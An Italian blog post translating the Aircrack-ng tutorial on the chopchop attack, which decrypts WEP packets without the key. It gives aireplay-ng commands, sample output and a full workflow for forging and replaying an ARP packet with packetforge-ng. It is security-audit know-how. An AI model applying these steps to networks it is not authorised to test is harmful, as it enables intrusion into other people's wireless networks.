Attacco chopchop con Aircrack-NG


Continuiamo con le traduzioni dei tutorial di Aircrack-ng.

Questa volta approfondiamo la seconda tecnica utilizzabile per attaccare un AP a cui non sono connessi altri client ( vedi qua ): l’attacco chopchop.

Mettete le mani sulla tastiera e cominciate. 

LINK ORIGINALE

  • DESCRIZIONE

Questo attacco, quando riesce, può decrittare un pacchetto dati WEP senza conoscerne la chiave. Può perfino funzionare contro il WEP dinamico. Questo attacco non recupera la chiave WEP in sé, ma rivela solamente il testo in chiaro.  Tuttavia, alcuni access point non sono vulnerabili a quest’attacco. Alcuni possono sembrare vulnerabili in un primo momento ma in realtà scartano pacchetti dati più corti di 60 byte. Se l’access point scarta pacchetti più corti di 42 byte, aireplay prova ad indovinare il resto dei dati mancanti, almeno fin quando gli header sono prevedibili. Se un pacchetto IP viene catturato, controlla aggiuntivamente che il checksum dell’header sia corretto dopo averne indovinato le parti mancanti. Questo attacco richiede almeno un pacchetto dati WEP.

Se desiderate saperne di più sulla teoria dietro a quest’attacco, consultate chopchop theory.

  • UTILIZZO

______________________________
 aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 ath0
______________________________

Dove:
– -4 sta per ‘attacco chopchop’
– -h 00:09:5B:RC:EE:F2 è l’indirizzo MAC di un client associato,od il MAC della vostra scheda se avete effettuato una falsa autenticazione.
– -b 00:14:6C:7E:40:80 è l’indirizzo MAC dell’access point
– ath0 è il nome dell’interfaccia wireless

Sebbene non venga mostrato, potete utilizzare uno degli altri filtri aireplay-ng. La pagina principale di aireplay-ng ha la lista completa. Filtri aggiuntivi tipici possono essere la -m e la -n per impostare le dimensioni minime e massime dei pacchetti da selezionare.

  • ESEMPI D’UTILIZZO

ESEMPIO CON UN OUTPUT CAMPIONE

__________________________
aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 ath0
_________________________

Dove:

– -4 sta per ‘attacco chopchop’
– -h 00:09:5B:RC:EE:F2 è l’indirizzo MAC della nostra scheda,e deve rispecchiare il MAC utilizzato nella falsa autenticazione.
– -b 00:14:6C:7E:40:80 è l’indirizzo MAC dell’access point
– ath0 è il nome dell’interfaccia wireless

Il sistema risponde:
____________________
 Read 165 packets…

         Size: 86, FromDS: 1, ToDS: 0 (WEP)
 
         BSSID  =  00:14:6C:7E:40:80
         Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:40:F4:77:E5:C9
 
         0x0000:  0842 0000 ffff ffff ffff 0014 6c7e 4080  .B……….l~@.
         0x0010:  0040 f477 e5c9 603a d600 0000 5fed a222  .@.w..`:…._.."
         0x0020:  e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543  …H……._=..C
         0x0030:  d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873  ….j…..%.[.(s
         0x0040:  16d4 43fb aebb 3ea1 7101 729e 65ca 6905  ..C…>.q.r.e.i.
         0x0050:  cfeb 4a72 be46                           ..Jr.F

 Use this packet ? y
_____________________________

Rispondete ?y? qui sopra ed il sistema continuerà.
_____________________________
 Saving chosen packet in replay_src-0201-191639.cap
 
 Offset   85 ( 0% done) | xor = D3 | pt = 95 |  253 frames written in   760ms
 Offset   84 ( 1% done) | xor = EB | pt = 55 |  166 frames written in   498ms
 Offset   83 ( 3% done) | xor = 47 | pt = 35 |  215 frames written in   645ms
 Offset   82 ( 5% done) | xor = 07 | pt = 4D |  161 frames written in   483ms
 Offset   81 ( 7% done) | xor = EB | pt = 00 |   12 frames written in    36ms
 Offset   80 ( 9% done) | xor = CF | pt = 00 |  152 frames written in   456ms
 Offset   79 (11% done) | xor = 05 | pt = 00 |   29 frames written in    87ms
 Offset   78 (13% done) | xor = 69 | pt = 00 |  151 frames written in   454ms
 Offset   77 (15% done) | xor = CA | pt = 00 |   24 frames written in    71ms
 Offset   76 (17% done) | xor = 65 | pt = 00 |  129 frames written in   387ms
 Offset   75 (19% done) | xor = 9E | pt = 00 |   36 frames written in   108ms
 Offset   74 (21% done) | xor = 72 | pt = 00 |   39 frames written in   117ms
 Offset   73 (23% done) | xor = 01 | pt = 00 |  146 frames written in   438ms
 Offset   72 (25% done) | xor = 71 | pt = 00 |   83 frames written in   249ms
 Offset   71 (26% done) | xor = A1 | pt = 00 |   43 frames written in   129ms
 Offset   70 (28% done) | xor = 3E | pt = 00 |   98 frames written in   294ms
 Offset   69 (30% done) | xor = BB | pt = 00 |  129 frames written in   387ms
 Offset   68 (32% done) | xor = AE | pt = 00 |  248 frames written in   744ms
 Offset   67 (34% done) | xor = FB | pt = 00 |  105 frames written in   315ms
 Offset   66 (36% done) | xor = 43 | pt = 00 |  101 frames written in   303ms
 Offset   65 (38% done) | xor = D4 | pt = 00 |  158 frames written in   474ms
 Offset   64 (40% done) | xor = 16 | pt = 00 |  197 frames written in   591ms
 Offset   63 (42% done) | xor = 7F | pt = 0C |   72 frames written in   217ms
 Offset   62 (44% done) | xor = 1F | pt = 37 |  166 frames written in   497ms
 Offset   61 (46% done) | xor = 5C | pt = A8 |  119 frames written in   357ms
 Offset   60 (48% done) | xor = 9B | pt = C0 |  229 frames written in   687ms
 Offset   59 (50% done) | xor = 91 | pt = 00 |  113 frames written in   339ms
 Offset   58 (51% done) | xor = 25 | pt = 00 |  184 frames written in   552ms
 Offset   57 (53% done) | xor = 94 | pt = 00 |   33 frames written in    99ms
 Offset   56 (55% done) | xor = F3 | pt = 00 |  193 frames written in   579ms
 Offset   55 (57% done) | xor = D6 | pt = 00 |   17 frames written in    51ms
 Offset   54 (59% done) | xor = FA | pt = 00 |   81 frames written in   243ms
 Offset   53 (61% done) | xor = EA | pt = 01 |   95 frames written in   285ms
 Offset   52 (63% done) | xor = 5D | pt = 37 |   24 frames written in    72ms
 Offset   51 (65% done) | xor = 33 | pt = A8 |   20 frames written in    59ms
 Offset   50 (67% done) | xor = CC | pt = C0 |   97 frames written in   291ms
 Offset   49 (69% done) | xor = 03 | pt = C9 |  188 frames written in   566ms
 Offset   48 (71% done) | xor = 34 | pt = E5 |   48 frames written in   142ms
 Offset   47 (73% done) | xor = 34 | pt = 77 |   64 frames written in   192ms
 Offset   46 (75% done) | xor = 51 | pt = F4 |  253 frames written in   759ms
 Offset   45 (76% done) | xor = 98 | pt = 40 |  109 frames written in   327ms
 Offset   44 (78% done) | xor = 3D | pt = 00 |  242 frames written in   726ms
 Offset   43 (80% done) | xor = 5E | pt = 01 |  194 frames written in   583ms
 Offset   42 (82% done) | xor = AF | pt = 00 |   99 frames written in   296ms
 Offset   41 (84% done) | xor = C4 | pt = 04 |  164 frames written in   492ms
 Offset   40 (86% done) | xor = CE | pt = 06 |   69 frames written in   207ms
 Offset   39 (88% done) | xor = 9D | pt = 00 |  137 frames written in   411ms
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms
 Sent 957 packets, current guess: B9…
 
 The AP appears to drop packets shorter than 35 bytes.
 Enabling standard workaround: ARP header re-creation.
 
 Saving plaintext in replay_dec-0201-191706.cap
 Saving keystream in replay_dec-0201-191706.xor
 
 Completed in 21s (2.29 bytes/s)
___________________________________________________

Vittoria! Il file "replay_dec-0201-191796.xor" di cui sopra può essere utilizzato nel passaggio successivo per generare un pacchetto con packetforge-ng come nel caso di un pacchetto ARP. Potete anche utilizzare tcpdump o Wireshark per osservare il pacchetto decrittato che è contenuto in replay_dec-0201-191706.cap.

GENERARE UN PACCHETTO ARP

1.Per prima cosa, decrittiamo un pacchetto
___________________
aireplay-ng -4 ath0
___________________

Se ciò non riesce, in molti casi l’access point scarta semplicemente i dati perché non conosce il MAC che li sta inviando. In questo caso dobbiamo utilizzare l’indirizzo MAC di un client connesso a cui è permesso inviare dati in rete:
___________________
    aireplay-ng -4 -h 00:09:5B:EB:C5:2B ath0
_____________________

2. Osserviamo l’indirizzo IP:
_________________________________
    tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
    reading from file replay_dec-0627-022301.cap, link-type […]
    IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1
_________________________________

3.Quindi prepariamo una richiesta ARP. L’IP di origine (192.168.1.100) non importa, ma l’IP di destinazione (192.128.1.2) deve rispondere alle richieste ARP. Il MAC di origine deve appartenere ad una stazione associata, nel caso in cui l’access point stia filtrando il traffico non autenticato.
_________________________________
packetforge-ng replay_dec-0627-022301.xor 1 00:13:10:30:24:9C 00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap
_________________________________

 4. E ripetiamo la nostra richiesta ARP
_____________________________________
    aireplay-ng -2 -r arp.cap ath0
_____________________________________

  • CONSIGLI DI UTILIZZO

Quando scartare un pacchetto? Potreste chiedervi se in certi momenti dovreste dire "no" nel selezionare uno specifico pacchetto. Ecco alcuni esempi in cui potreste dire no:

– la lunghezza del pacchetto è minima e volete/avete bisogno di un PRGA più lungo della lunghezza del pacchetto.
– State cercando di decrittare un pacchetto da/verso un client specifico e dovete attendere un pacchetto da/verso l’indirizzo MAC di quel client.
– Potreste voler prendere intenzionalmente un pacchetto corto. Per la ragione che il tempo di decrittazione è lineare alla lunghezza del pacchetto. Pacchetti piccoli richiedono meno tempo.

  • RISOLUZIONE DEI PROBLEMI D’UTILIZZO

Consultate inoltre gli argomenti generali di risoluzione dei problemi in aireplay-ng: aireplay-ng usage troubleshooting.

Sebbene non rappresenti un consiglio mirato per la risoluzione dei problemi riguardo all’attacco chopchop, se non siete in grado di portarlo a segno, c’è ne sono altri che dovreste prendere in considerazione:

– Attacco a Frammentazione ( 1 e 2 ): Questo è un metodo alternativo per ottenere il PRGA per costruire pacchetti per l’iniezione a seguire.
metodo -p 0841 : Questa tecnica vi permette di reiniettare qualunque pacchetto dati ricevuto dall’access point e generare IV.

  1. Nessun commento ancora.
(non verrà pubblicata)